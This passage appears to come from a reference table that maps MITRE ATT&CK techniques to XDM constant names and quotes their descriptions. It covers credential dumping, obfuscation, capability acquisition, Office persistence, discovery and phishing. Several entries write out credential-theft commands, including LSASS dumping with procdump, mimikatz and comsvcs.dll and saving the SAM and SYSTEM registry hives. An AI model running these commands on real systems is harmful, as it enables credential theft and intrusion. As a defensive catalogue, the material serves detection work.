the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.
(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per
system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking]
(https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg]
(https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached
credentials. Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib
mscache) https://attack.mitre.org/techniques/T1003/005
T1003.006 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_DCSYNC Adversaries may attempt to access credentials and other sensitive information by abusing a Windows
Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation:
Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the
replication process from a remote domain controller using a technique called DCSync. Members of the
Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain
controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active
Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT
and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/
techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation:
Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation]
(https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017) DCSync
functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/
S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs
DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017) https://attack.mitre.org/
techniques/T1003/006
T1003.004 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_LSA_SECRETS Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets,
which can contain a variety of different credential materials, such as credentials for service accounts.
(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows
Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets.
LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets) [Reg](https://
attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://
attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA
Secrets) https://attack.mitre.org/techniques/T1003/004
T1003.001 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_LSASS_MEMORY Adversaries may attempt to access credential material stored in the process memory of the Local Security
Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of
credential materials in LSASS process memory. These credential materials can be harvested by an
administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/
TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well
as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed
on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe
lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp *
sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: *
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity
Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Windows
Security Support Provider (SSP) DLLs are loaded into the LSASS process at system start. Once loaded into
the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as
any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry
keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may
modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when
the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can
be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done
through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use
with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.
(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain
authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for
Remote Desktop Services.(Citation: TechNet Blogs Credential Protection) https://attack.mitre.org/
techniques/T1003/001
T1003.003 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_NTDS Adversaries may attempt to access or create a copy of the Active Directory domain database in order to
steal credential information, as well as obtain other information about domain members such as devices,
users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit
of a domain controller.(Citation: Wikipedia Active Directory) In addition to looking for NTDS files on active
Domain Controllers, attackers may search for backups that contain the same or similar information.
(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and
the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-
built Windows tool, ntdsutil.exe * Invoke-NinjaCopy https://attack.mitre.org/techniques/T1003/003
T1003.007 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_PROC_FILESYSTEM Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc
filesystem on Linux contains a great deal of information regarding the state of the running operating system.
Processes running with root privileges can use this facility to scrape live memory of other running
programs. If any of these programs store passwords in clear text or password hashes in memory, these
values can then be harvested for either usage or brute force attacks, respectively. This functionality has
been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool
inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for
text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use
memory to store such authentication artifacts. https://attack.mitre.org/techniques/T1003/007
T1003.002 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_SECURITY_ACCOUNT_MANAGER Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database
either through in-memory techniques or through the Windows Registry where the SAM database is stored.
The SAM is a database file that contains local accounts for the host, typically those found with the net
user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be
used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://
attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLM\sam sam * reg
save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve
hashes.(Citation: GitHub Creddump7) Notes: * RID 500 account is the local, built-in administrator. * RID
501 is the guest account. * User accounts start with a RID of 1,000+. https://attack.mitre.org/techniques/
T1003/002
T1027 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting,
encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that
can be used across different platforms and the network to evade defenses. Payloads may be compressed,
archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or
later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode
Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/
techniques/T1204). The user may also be required to input a password to open a password protected
compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November
2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can
also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation:
Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign
files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept
2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and
Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters,
and other platform/language specific semantics can be used to evade signature based detections and
application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-
Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) https://attack.mitre.org/
techniques/T1027
T1027.001 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_BINARY_PADDING Adversaries may use binary padding to add junk data and change the on-disk representation of malware.
This can be done without affecting the functionality or behavior of a binary, but can increase the size of the
binary beyond what some security tools are capable of handling due to file size limitations. Binary padding
effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static
anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function
to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist
Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and
detection capabilities that are not designed or configured to scan large files. This may also reduce the
likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limit the
maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) https://attack.mitre.org/
techniques/T1027/001
T1027.004 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_COMPILE_AFTER_DELIVERY Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as
uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections
targeting executables/binaries. These payloads will need to be compiled before execution; typically via
native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018) Source code
payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as
a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats
unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being
(re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation:
TrendMicro WindowsAppMac) https://attack.mitre.org/techniques/T1027/004
T1027.006 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_HTML_SMUGGLING Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of
seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs
(immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also
be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents.
HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML
Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018) Adversaries may deliver
payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs
and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled
malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such
as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML
files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e.
[Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially
bypassing content filters. For example, JavaScript Blobs can be abused to dynamically generate malicious
files in the victim machine and may be dropped to disk by abusing JavaScript functions such as
msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)
(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017) https://
attack.mitre.org/techniques/T1027/006
T1027.005 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_INDICATOR_REMOVAL_FROM_TOOLS Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined,
or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version
that is no longer detected by the target's defensive systems or subsequent targets that may use similar
systems. A good example of this is when malware is detected with a file signature and quarantined by anti-
virus software. An adversary who can determine that the malware was quarantined because of its file
signature may modify the file to explicitly avoid that signature, and then re-use the malware.
https://attack.mitre.org/techniques/T1027/005
T1027.002 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_SOFTWARE_PACKING Adversaries may perform software packing or virtual machine software protection to conceal their code.
Software packing is a method of compressing or encrypting an executable. Packing an executable changes
the file signature in an attempt to avoid signature-based detection. Most decompression techniques
decompress the executable code in memory. Virtual machine software protection translates an executable's
original code into a special format that only a special virtual machine can run. A virtual machine is then
called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are
called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is
available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques
that do not leave the same artifacts as well-known packers to evade defenses.
https://attack.mitre.org/techniques/T1027/002
T1027.003 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_STEGANOGRAPHY Adversaries may use steganography techniques in order to prevent the detection of hidden information.
Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video
clips, or text files. [Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that
used steganography. It encrypted the gathered information from a victim's system and hid it within an image
before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) By the end of 2017, a threat group
used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an
image file (.png) and execute the code on a victim's system. In this particular case the
[PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence
from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc
Targets Pyeongchang Olympics) https://attack.mitre.org/techniques/T1027/003
T1588 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing
their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may
include the acquisition of malware, software (including licenses), exploits, certificates, and information
relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout
numerous phases of the adversary lifecycle. In addition to downloading free malware, software, and
exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party
entities can include technology companies that specialize in malware and exploits, criminal marketplaces,
or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab) In addition to purchasing
capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This
can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed
databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)
https://attack.mitre.org/techniques/T1588
T1588.003 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_CODE_SIGNING_CERTIFICATES Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing
is the process of digitally signing executables and scripts to confirm the software author and guarantee that
the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from
the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code
Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code
even if they don't know who issued the certificate or who the author is. Prior to
[Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use
in operations. The purchase of code signing certificates may be done using a front organization or using
information stolen from a previously compromised entity that allows the adversary to validate to a certificate
provider as that entity. Adversaries may also steal code signing materials directly from a compromised
third-party. https://attack.mitre.org/techniques/T1588/003
T1588.004 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_DIGITAL_CERTIFICATES Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS
certificates are designed to instill trust. They include information about the key, information about its owner's
identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the
signature is valid, and the person examining the certificate trusts the signer, then they know they can use
that key to communicate with its owner. Adversaries may purchase or steal SSL/TLS certificates to further
their operations, such as encrypting C2 traffic (ex:
[Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even
enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or
otherwise added to the root of trust (i.e.
[Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using
information stolen from a previously compromised entity that allows the adversary to validate to a certificate
provider as that entity. Adversaries may also steal certificate materials directly from a compromised
third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or
hijack domains that they will later purchase an SSL/TLS certificate for. Certificate authorities exist that allow
adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's
Encrypt FAQ) After obtaining a digital certificate, an adversary may then install that certificate (see
[Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.
https://attack.mitre.org/techniques/T1588/004
Original Mapped Description
T1588.005 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_EXPLOITS Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes
advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on
computer hardware or software. Rather than developing their own exploits, an adversary may find/modify
exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation:
TempertonDarkHotel)(Citation: NationsBuying) In addition to downloading free exploits from the internet,
adversaries may purchase exploits from third-party entities. Third-party entities can include technology
companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from
individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing
exploits, adversaries may steal and repurpose exploits from third-party entities (including other
adversaries).(Citation: TempertonDarkHotel) An adversary may monitor exploit provider forums to
understand the state of existing, as well as newly discovered, exploits. There is usually a delay between
when an exploit is discovered and when it is made public. An adversary may target the systems of those
known to conduct exploit research and development in order to gain that knowledge for use during a
subsequent operation. Adversaries may use exploits during various phases of the adversary lifecycle (i.e.
[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190),
[Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203),
[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068),
[Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211),
[Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212),
[Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and
[Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
https://attack.mitre.org/techniques/T1588/005
T1588.001 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_MALWARE Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can
include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries
may acquire malware to support their operations, obtaining a means for maintaining control of remote
machines, evading defenses, and executing post-compromise behaviors. In addition to downloading free
malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party
entities can include technology companies that specialize in malware development, criminal marketplaces
(including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware,
adversaries may steal and repurpose malware from third-party entities (including other adversaries).
https://attack.mitre.org/techniques/T1588/001
T1588.002 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_TOOL Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be
open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but
(unlike malware) were not intended to be used for those purposes (ex:
[PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including
for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software
may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial
versions.(Citation: Recorded Future Beacon 2019) Adversaries may obtain tools to support their operations,
including to support execution of post-compromise behaviors. In addition to freely downloading or
purchasing software, adversaries may steal software and/or software licenses from third-party entities
(including other adversaries). https://attack.mitre.org/techniques/T1588/002
T1588.006 XDM_CONST.MITRE_TECHNIQUE_OBTAIN_CAPABILITIES_VULNERABILITIES Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability
is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to
cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by
searching open databases or gaining access to closed vulnerability databases.(Citation: National
Vulnerability Database) An adversary may monitor vulnerability disclosures/databases to understand the
state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a
vulnerability is discovered and when it is made public. An adversary may target the systems of those known
to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause
an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005))
or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).
https://attack.mitre.org/techniques/T1588/006
T1137 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft
Office is a fairly common application suite on Windows-based operating systems within an enterprise
network. There are multiple mechanisms that can be used with Office for persistence when an Office-based
application is started; this can include the use of Office Template Macros and add-ins. A variety of features
have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms,
and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within
Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
https://attack.mitre.org/techniques/T1137
T1137.006 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_ADD_INS Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office
add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are
different types of add-ins that can be used by the various Office products; including Word/Excel add-in
Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins,
VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs
Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018) Add-ins can be used to obtain persistence
because they can be set to execute code when an Office application starts.
https://attack.mitre.org/techniques/T1137/006
T1137.001 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OFFICE_TEMPLATE_MACROS Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system.
Microsoft Office contains templates that are part of common Office applications and are used to customize
styles. The base templates within the application are used each time an application starts. (Citation:
Microsoft Change Normal Template) Office Visual Basic for Applications (VBA) macros (Citation: MSDN
VBA in Office) can be inserted into the base template and used to execute code when the respective Office
application starts in order to obtain persistence. Examples for both Word and Excel have been discovered
and published. By default, Word has a Normal.dotm template created that can be modified to include a
malicious macro. Excel does not have a template file created by default, but one can be added that will
automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros)
Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019)
Word Normal.dotm location: C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm
Excel Personal.xlsb location: C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB
Adversaries may also change the location of the base template to point to their own by hijacking the application's search
order, e.g. Word 2016 will first look for Normal.dotm under C:\Program Files (x86)\Microsoft Office\root\Office16\,
or by modifying the GlobalDotName registry key. By modifying the
GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to
use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may
first need to register the template as a trusted document or place it in a trusted location.(Citation:
GlobalDotName Jun 2019) An adversary may need to enable macros to execute unrestricted depending on
the system or enterprise security policy on use of macros. https://attack.mitre.org/techniques/T1137/001
T1137.002 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OFFICE_TEST Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a
compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL
that will be executed every time an Office application is started. This Registry key is thought to be used by
Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This
Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation:
Palo Alto Office Test Sofacy) There exist user and global Registry keys for the Office Test feature:
* HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf
* HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf
Adversaries may add this
Registry key and specify a malicious DLL that will be executed whenever an Office application, such as
Word or Excel, is started. https://attack.mitre.org/techniques/T1137/002
T1137.003 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OUTLOOK_FORMS Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook
forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms
can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the
same custom Outlook form.(Citation: SensePost Outlook Forms) Once malicious forms have been added to
the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an
adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)
https://attack.mitre.org/techniques/T1137/003
T1137.004 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OUTLOOK_HOME_PAGE Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised
system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This
feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A
malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation:
SensePost Outlook Home Page) Once malicious home pages have been added to the user’s mailbox, they
will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is
loaded/reloaded.(Citation: SensePost Outlook Home Page) https://attack.mitre.org/techniques/T1137/004
T1137.005 XDM_CONST.MITRE_TECHNIQUE_OFFICE_APPLICATION_STARTUP_OUTLOOK_RULES Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook
rules allow a user to define automated behavior to manage email messages. A benign rule might, for
example, automatically move an email to a particular folder in Outlook if it contains specific words from a
specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary
sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules) Once malicious rules
have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will
execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook
Rules) https://attack.mitre.org/techniques/T1137/005
T1201 XDM_CONST.MITRE_TECHNIQUE_PASSWORD_POLICY_DISCOVERY Adversaries may attempt to access detailed information about the password policy used within an
enterprise network or cloud environment. Password policies are a way to enforce complex passwords that
are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This
information may help the adversary to create a list of common passwords and launch dictionary and/or
brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not
trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is
set to 6 as to not lock out accounts). Password policies can be set and discovered on Windows, Linux, and
macOS systems via various command shell utilities such as net accounts (/domain),
Get-ADDefaultDomainPasswordPolicy, chage -l <username>, cat /etc/pam.d/common-password, and pwpolicy
getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password
Policies). Password policies can be discovered in cloud environments using available APIs such as
GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).
https://attack.mitre.org/techniques/T1201
T1120 XDM_CONST.MITRE_TECHNIQUE_PERIPHERAL_DEVICE_DISCOVERY Adversaries may attempt to gather information about attached peripheral devices and components
connected to a computer system. Peripheral devices could include auxiliary resources that support a variety
of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The
information may be used to enhance their awareness of the system and network environment or may be
used for further actions. https://attack.mitre.org/techniques/T1120
T1069 XDM_CONST.MITRE_TECHNIQUE_PERMISSION_GROUPS_DISCOVERY Adversaries may attempt to find group and permission settings. This information can help adversaries
determine which user accounts and groups are available, the membership of users in particular groups, and
which users and groups have elevated permissions. https://attack.mitre.org/techniques/T1069
T1069.003 XDM_CONST.MITRE_TECHNIQUE_PERMISSION_GROUPS_DISCOVERY_CLOUD_GROUPS Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission
groups can help adversaries determine the particular roles of users and groups within an environment, as
well as which users are associated with a particular group. With authenticated access there are several
tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to
obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)
(Citation: GitHub Raindance). Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide
interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups
associated to a user account for Azure while the API endpoint
GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google
(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud
Identity API Documentation). Adversaries may attempt to list ACLs for objects to determine the owner and
other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get
Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or
leverage accounts they have already compromised to access the object.
https://attack.mitre.org/techniques/T1069/003
T1069.002 XDM_CONST.MITRE_TECHNIQUE_PERMISSION_GROUPS_DISCOVERY_DOMAIN_GROUPS Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-
level permission groups can help adversaries determine which groups exist and which users belong to a
particular group. Adversaries may use this information to determine which users have elevated
permissions, such as domain administrators. Commands such as net group /domain of the
[Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can
list domain-level groups. https://attack.mitre.org/techniques/T1069/002
T1069.001 XDM_CONST.MITRE_TECHNIQUE_PERMISSION_GROUPS_DISCOVERY_LOCAL_GROUPS Adversaries may attempt to find local system groups and permission settings. The knowledge of local
system permission groups can help adversaries determine which groups exist and which users belong to a
particular group. Adversaries may use this information to determine which users have elevated
permissions, such as the users found within the local administrators group. Commands such as net
localgroup of the [Net](https://attack.mitre.org/software/S0039) utility, dscl . -list /Groups on
macOS, and groups on Linux can list local groups. https://attack.mitre.org/techniques/T1069/001
T1566 XDM_CONST.MITRE_TECHNIQUE_PHISHING Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are
electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In
spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally,
adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. Adversaries
may send victims emails containing malicious attachments or links, typically to execute malicious code on
victim systems. Phishing may also be conducted via third-party services, like social media platforms.
Phishing may also involve social engineering techniques, such as posing as a trusted source.
https://attack.mitre.org/techniques/T1566
T1598 XDM_CONST.MITRE_TECHNIQUE_PHISHING_FOR_INFORMATION Adversaries may send phishing messages to elicit sensitive information that can be used during targeting.
